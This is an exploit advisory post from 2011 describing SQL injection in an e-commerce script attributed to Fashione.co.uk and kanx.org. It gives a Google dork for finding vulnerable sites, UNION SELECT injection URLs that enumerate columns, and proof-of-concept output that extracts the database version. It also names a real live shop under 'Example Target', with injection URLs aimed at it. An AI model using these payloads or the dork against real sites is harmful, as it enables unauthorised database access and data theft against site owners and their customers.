################################################################
[+] Exploit Title: E-Commerce Fashione.co.uk & www.kanx.org [SQL Injection]
[+] Google Dork: "Powered by: Fashione.co.uk" or "Ecommerce Design by www.kanx.org"
[+] Date: November 10, 2011
[+] Author: D4wFl1N
[+] Contact : D4wFl1N[at]deadc0de[dot]or[dot]id
[+] Web : http://D4wFl1N.blogspot.com
[+] Software Link: http://www.fashione.co.uk/ | http://www.kanx.org/
[+] Category: web apps [SQL Injection]
[+] Tested on: [Windows XP]
#################################################################
[+] Vulnerability :
*SQL injection Vulnerability*
http://localhost/path/index.php?page_id=dept&id=1'
http://localhost/path/index.php?page_id=dept&id=1&deptid=1+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,[deadc0de],9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
http://localhost/path/index.php?page_id=brand&brandid=1
http://localhost/path/index.php?page_id=brand&brandid=1&id=1&deptid=1
[+] POC
http://localhost/path/index.php?page_id=dept&id=1&deptid=1+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
Result : 8 10 \ Page 1
Selected Column Count is 30
Valid String Column is 8 and 10
http://localhost/path/index.php?page_id=dept&id=33&deptid=65+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
Result : 5.0.92-community 10 \ Page 1
http://localhost/path/index.php?page_id=dept&id=33&deptid=65+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
Result : 8 5.0.92-community \ Page 1
[+] Example Target
http://www.fusionfashion.co.uk/index.php
http://www.fusionfashion.co.uk/index.php?page_id=dept&id=1'
http://www.fusionfashion.co.uk/index.php?page_id=dept&id=1&deptid=1'
http://www.fusionfashion.co.uk/index.php?page_id=dept&id=1&deptid=1+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
################################################################################
[+] Greets : r3d3_deadc0de, Gwe_meonkzt, p4rcomx, th3-w1tch, Dr.Cr4sh, Oghie, vim-n4n0, Avant Levithan a.k.a Bokepers :D and you
deadc0de-Team, Makassar Ethical Hacker, xCrew,nyubicrew Mildnet, irc.byroe.net
################################################################################
0 comments:
Post a Comment